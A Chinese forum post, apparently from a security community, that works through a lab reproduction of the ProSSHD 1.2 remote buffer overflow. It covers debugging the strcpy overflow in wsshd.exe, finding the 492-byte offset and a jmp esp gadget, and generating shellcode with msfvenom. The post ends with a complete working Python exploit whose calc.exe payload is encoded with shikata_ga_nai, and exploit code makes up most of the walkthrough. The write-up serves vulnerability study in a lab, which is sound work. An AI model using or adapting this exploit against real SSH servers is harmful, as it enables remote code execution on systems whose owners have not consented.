-
-
[分享]ProSSHD 1.2 20090726 - Remote Buffer Overflow
-
发表于: 2021-6-4 22:04
-
前言
此软件历史存在的漏洞相信很多朋友已经分析并分享过了,但随着时间的迁移,系统升级,相关工具跟不上脚步,所以此文章的核心是把一些环境细节更标准化,比如使用Windbg作为主要调试工具。
环境描述
1 2 3 4 5 6 | 系统: Microsoft Windows [版本 10.0.19042.985] x64windbg:10.0.17763.132(x86),通过winsdksetup下载,版本要对Python : 2.7.1 (r271:86832, Nov 27 2010, 18:30:46) PyKD:0.2.0.29ProSSHD:1.2 20090726sokit:调试网络小工具 |
参考信息:
1 2 | windbg:https://go.microsoft.com/fwlink/p/?LinkID=2033908ProSSHD:https://www.exploit-db.com/apps/dc04ef8768717e17f322f78316704008-sshdlabp.exe |
环境部署
1.winsdksetup:下载windbg并配置好mona.
如图: 
2.账户设置:
username:test1
password:asdf
如图: 
3.配置Windbg监控:windbg -I,注意权限:Admin
4.安装ProSSHD:下载dc04ef8768717e17f322f78316704008,默认安装即可。特别说明在使用过程中出现“0 day”问题,于时间有关,处理方法则是修改系统时间,比如2011.xx.xx,之后就会看到"free 30 day",此时点击“是(Y)”即可:
5.初始化XWP SSH服务:
6.启动“Run as exe”:
7.验证效果 ip: 192.168.233.128, port:22 :
注意:当出现下图错误,强制关闭连接,有可能是时间被同步了,所以重新修改为2011.XX.XX即可。
实验操作
1.漏洞触发脚本:
1 2 3 4 5 6 7 8 9 | import paramikofrom scpclient import *import timessh = paramiko.SSHClient()ssh.load_system_host_keys()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect(hostname='192.168.233.128', port=22, username='test1', password='asdf', key_filename=None)Write(ssh.get_transport(), "A"*500)ssh.close() |
效果图:
2.从上面测试得出出发漏洞的真正进程为“wsshd.exe”
3.动静态结合分析一下
1.析出关键函数:
401920:真正漏洞事发地,strcpy(Destination, a1);
;
2.看一下“Destination”,“a1”,的大小,问题就突显了:
Destination:512字节
a1:520个字节
3.F10 对比一下是覆盖情况即可,保持简洁。
4.在函数返回指令下断,我们的预期目标出现,到此结束:
POC构建:
1.确定偏移:mona pc 500, offset: 492
1 2 3 4 5 6 7 8 9 10 11 | import paramikofrom scpclient import *import timessh = paramiko.SSHClient()ssh.load_system_host_keys()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect(hostname='192.168.233.128', port=22, username='test1', password='asdf', key_filename=None)time.sleep(15)# Write(ssh.get_transport(), "A"*500).close()Write(ssh.get_transport(), "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq").close()ssh.close() |
2.
1.非DEP情况:
1.寻找跳板:mona modules,ASLR->FALSE
mona jmp -r esp -m MSVCR71.dll
跳板地址:0x7c345c30
2.msf生成shellcode:
1 | msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a' -e x86/shikata_ga_nai -f py > sc.txt |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | buf = b""buf += b"\xbe\xc3\x23\x1d\x88\xdb\xd7\xd9\x74\x24\xf4\x5d\x31"buf += b"\xc9\xb1\x31\x31\x75\x13\x03\x75\x13\x83\xc5\xc7\xc1"buf += b"\xe8\x74\x2f\x87\x13\x85\xaf\xe8\x9a\x60\x9e\x28\xf8"buf += b"\xe1\xb0\x98\x8a\xa4\x3c\x52\xde\x5c\xb7\x16\xf7\x53"buf += b"\x70\x9c\x21\x5d\x81\x8d\x12\xfc\x01\xcc\x46\xde\x38"buf += b"\x1f\x9b\x1f\x7d\x42\x56\x4d\xd6\x08\xc5\x62\x53\x44"buf += b"\xd6\x09\x2f\x48\x5e\xed\xe7\x6b\x4f\xa0\x7c\x32\x4f"buf += b"\x42\x51\x4e\xc6\x5c\xb6\x6b\x90\xd7\x0c\x07\x23\x3e"buf += b"\x5d\xe8\x88\x7f\x52\x1b\xd0\xb8\x54\xc4\xa7\xb0\xa7"buf += b"\x79\xb0\x06\xda\xa5\x35\x9d\x7c\x2d\xed\x79\x7d\xe2"buf += b"\x68\x09\x71\x4f\xfe\x55\x95\x4e\xd3\xed\xa1\xdb\xd2"buf += b"\x21\x20\x9f\xf0\xe5\x69\x7b\x98\xbc\xd7\x2a\xa5\xdf"buf += b"\xb8\x93\x03\xab\x54\xc7\x39\xf6\x32\x16\xcf\x8c\x70"buf += b"\x18\xcf\x8e\x24\x71\xfe\x05\xab\x06\xff\xcf\x88\xf9"buf += b"\xb5\x52\xb8\x91\x13\x07\xf9\xff\xa3\xfd\x3d\x06\x20"buf += b"\xf4\xbd\xfd\x38\x7d\xb8\xba\xfe\x6d\xb0\xd3\x6a\x92"buf += b"\x67\xd3\xbe\xf1\xe6\x47\x22\xd8\x8d\xef\xc1\x24" |
- 填充字节 + jmp esp + shellcode:主要是跳板的运用,多调试就了解,说再多无用,上完整利用代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | import paramikofrom scpclient import *import timeimport structbuf = b""buf += b"\xbe\xc3\x23\x1d\x88\xdb\xd7\xd9\x74\x24\xf4\x5d\x31"buf += b"\xc9\xb1\x31\x31\x75\x13\x03\x75\x13\x83\xc5\xc7\xc1"buf += b"\xe8\x74\x2f\x87\x13\x85\xaf\xe8\x9a\x60\x9e\x28\xf8"buf += b"\xe1\xb0\x98\x8a\xa4\x3c\x52\xde\x5c\xb7\x16\xf7\x53"buf += b"\x70\x9c\x21\x5d\x81\x8d\x12\xfc\x01\xcc\x46\xde\x38"buf += b"\x1f\x9b\x1f\x7d\x42\x56\x4d\xd6\x08\xc5\x62\x53\x44"buf += b"\xd6\x09\x2f\x48\x5e\xed\xe7\x6b\x4f\xa0\x7c\x32\x4f"buf += b"\x42\x51\x4e\xc6\x5c\xb6\x6b\x90\xd7\x0c\x07\x23\x3e"buf += b"\x5d\xe8\x88\x7f\x52\x1b\xd0\xb8\x54\xc4\xa7\xb0\xa7"buf += b"\x79\xb0\x06\xda\xa5\x35\x9d\x7c\x2d\xed\x79\x7d\xe2"buf += b"\x68\x09\x71\x4f\xfe\x55\x95\x4e\xd3\xed\xa1\xdb\xd2"buf += b"\x21\x20\x9f\xf0\xe5\x69\x7b\x98\xbc\xd7\x2a\xa5\xdf"buf += b"\xb8\x93\x03\xab\x54\xc7\x39\xf6\x32\x16\xcf\x8c\x70"buf += b"\x18\xcf\x8e\x24\x71\xfe\x05\xab\x06\xff\xcf\x88\xf9"buf += b"\xb5\x52\xb8\x91\x13\x07\xf9\xff\xa3\xfd\x3d\x06\x20"buf += b"\xf4\xbd\xfd\x38\x7d\xb8\xba\xfe\x6d\xb0\xd3\x6a\x92"buf += b"\x67\xd3\xbe\xf1\xe6\x47\x22\xd8\x8d\xef\xc1\x24"jmp_esp = struct.pack('<L',0x7c345c30)ssh = paramiko.SSHClient()ssh.load_system_host_keys()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect(hostname='192.168.233.128', port=22, username='test1', password='asdf', key_filename=None)time.sleep(15)# Write(ssh.get_transport(), "A"*500).close()#"A"*489+{jmp_esp}+buf# 0x7c345c30 shellcode = "A" * 492 + jmp_esp + "\x90\x90\x90\x90\x90\x90\x90" + bufWrite(ssh.get_transport(), shellcode).close()ssh.close() |
总结:
整体来说,还是比较完整的,熟悉基本知识,再接再厉。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
|
|
|---|---|
